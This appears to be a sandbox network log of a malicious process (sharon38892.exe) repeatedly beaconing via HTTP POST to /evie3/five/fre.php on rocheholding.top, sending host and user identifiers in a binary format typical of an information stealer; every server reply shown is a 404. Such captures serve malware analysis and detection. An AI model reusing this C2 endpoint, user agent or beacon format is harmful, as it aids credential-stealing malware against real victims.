May 23, 2024 20:17:35.880770922 CEST	619	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i6gJfvO7olfEsdyqt3RGG%2BL80oSkjC0dkl0pQDPrdA%2FOrqBRl824zYh%2FQlsYMOyTb1LhCVC2HJDcAJ7C3pkD4gvqSi%2B84qaGVYiCtS6gehR0uVH%2BdcmY70LhekTy3vlZxrwS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b2d4e8542c4-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49165	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:36.624490023 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 176 Connection: close
May 23, 2024 20:17:36.664830923 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus141700ALBUS-PC+0DE4229FCF97F5879F50F8FD3DaHSF
May 23, 2024 20:17:37.356448889 CEST	615	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Cx05J3EhhX%2FOS64qMqLws5JP%2BEUh3VGZct31FDQXRJvKx7kiOFrgsQf0a6%2FqaxSC8WAc4IgNUS3w8YZXOcd5Bv0017KpFQTBpNxqRY67ZT3FQBncncDxNDgt26dNdVM4GsM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b3678c18cdd-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49166	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:38.077506065 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:38.127974987 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:38.840037107 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HdpNFt46F1HF0%2BGP88bbvWo8Wo8ZOKgPopbyFeXlVP7lvxxjy11II5UA1hdYtSG4xCHka%2F2j8xNUiQpS58FkteOWw6wXfgaIhoHOS%2BpdsZrEQCxpwTvLy65XlkhFb2nXLzTl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b3fbcbb8cba-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49167	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:39.511373997 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:39.548326015 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:40.474148989 CEST	629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1KWReV%2FS%2FEdrVyy5aWpznp0MnToUNd1b7OjNpheZorXyxJGnzNIBBj8KFNuC1DJFQgnlGcrL%2FQCAluFOmz8Orutys%2FNfFcl26EPkI%2FBLZ2rcvpcoJ119%2BNojt2d4BR5czoQS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b486a644345-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49168	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:40.814233065 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:40.859951019 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:41.576291084 CEST	625	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PhrS9S1Kc1L9QFPD8Oa8i4r5L2t7fskLt%2B0Y6B7SUCz%2FibpTrid6xUEleBFB%2Fc1QGsT3WoNRedHxmd0yBOEKyKke8QWjOZYT96DaO%2BPSuXh5Xb15n4y0loRE4osrRNfwHKXf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b50ecf0179d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49169	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:42.120354891 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:42.170939922 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:42.919584990 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ziOK6F00JN8Iv0Q5k2W2so3cc%2Bl538lOy2UVbCCkkdTTWgC4THkNzxl6PAYKa3gvfWY4Pa6%2BM4e2Us0D1BR4Sp9NKE07r8jqN%2F9Z4XmuLzDSO04UvjzrDDzWdu5wOeYJb7C"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b593c6e330c-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49170	188.114.97.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:43.183161974 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:43.233190060 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:43.932068110 CEST	625	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=USAS47hLYJL19JqG82%2BuJ5n4LWYWKs2k3h2IlrSTcd4VANF8U63PubUaCAm4Ku0XP5h5tk4ANMk%2FjziAAX7MTYJA%2BQQLiBRoobM%2BpYsc96d4F3FpXcnJqyJFRDK4yyQRPmjN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b5f98f272b7-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49171	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:44.106858969 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:44.162367105 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:44.893239975 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XP8Z0Vmp5YbtXny9k1gCdr8MPc6%2BqIsB60k1OhG4qGx2dM9PDV3RANOCkx7ZoTopeXLyAP6eYmQzxzxy8FBi%2FGT%2FvyPLuSmXiRppDDEhanjHjtw67HXWC9HVnqlS6PCPSst0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b657fddc3eb-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49172	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:45.155200958 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:45.203666925 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:45.883692026 CEST	619	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0S9DQhZ7kD1vRANZyNNLix3LteO8PLCYfRwmHPdWpAQpswfHdnPPXnUNhy54EeYkFa%2FfKpiXind6yUIf5KyUGrKdVoS20Q7UMMwkEOvgkexxcA8Yxv9dy5ZWDVwLMyat8YVr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b6bea133344-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49173	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:46.332436085 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:46.383657932 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:47.055252075 CEST	619	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sWr2VtaSnYGrgzccJdFscUp8CgPkO80RhBa9SVqLKbu5QeSqsfZvBjTf34uqidUIi7cmqvr7%2FvqEh54A5T1i50Nz4EkoMmKm9QfFdSICRabFLnKplKxO1FYIk6TVogQvPyxI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b732caf8c75-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.22	49174	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:47.208604097 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:47.267741919 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:47.933002949 CEST	617	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ESxxeqkVfXF4VXFtfwLi2yGgBWfCEiyib2cgHDr8xXO8VtKl00qeb3ZBqxMO2RHaO4NclNP5NID3Q4JDHIuWRVN1e7zwzn2Q1yOfNgkCEhTjSrKxedDjzz5grPDIuAG9FnU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b789aaa1811-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.22	49175	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:48.088332891 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:48.139667034 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:48.808289051 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TbO9%2Ff51En40xXUMJXBvaPx4ztxvOLbvO7aizt%2FvCWXp2CuRTdYI7dXwfMNF80ybpsblGGrOi%2FFltB5XK%2BsjMETTkcWse8IiY3cRz%2BVNOr6Zt2rFvjP3ce9Dkxwh2V8OJ6RP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b7e2a2a8c9c-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.22	49176	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:49.147569895 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:49.199896097 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:49.905791998 CEST	621	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2JPT0Eb6h3KGkRsCTJfPWXIV1ZBxIfevIfmMz4YfmdnuDoOIikL0wZXbpqOXoR9SkCF9vzInM%2FmKT8KIZYcwUppVfhuSX170ub%2F1Asm3UiK4J08BeoYx7wAgaPEh1Q7gCzm9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b84e88bc46b-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.22	49177	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:50.058542013 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:50.112425089 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:50.802231073 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NxQCk6kB3AkHfa9RbBk5OmGVIy1dF7b2Zl9nv2KMmKzs%2Fv0E3GG0A2TwyCyLZdxfxT%2FVfrtBoPT2rbRPgOOOfC8DCeLIkzHj3CbD%2FZZXzwPR6X94lgLv%2FopoRvcv%2FYhxtSiZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b8a8f370cc4-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.22	49178	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:50.944456100 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:50.995795965 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:17:51.653791904 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:17:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wXUAwumeRTn2EPKrghXM5f5O7yux9kh2yje9ZqNVBf38rZ%2Bnw%2FLLCDz9%2FPEHIAqjoFwh2Nqnz0hDhBg%2BA9E1zpC7d4qKWW9n3QsJNoFQid0JY75OR73Cg8t%2FFLfvJAJUXahH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870b8ffc4d19ef-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.22	49179	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:17:51.806005955 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:17:51.855957031 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
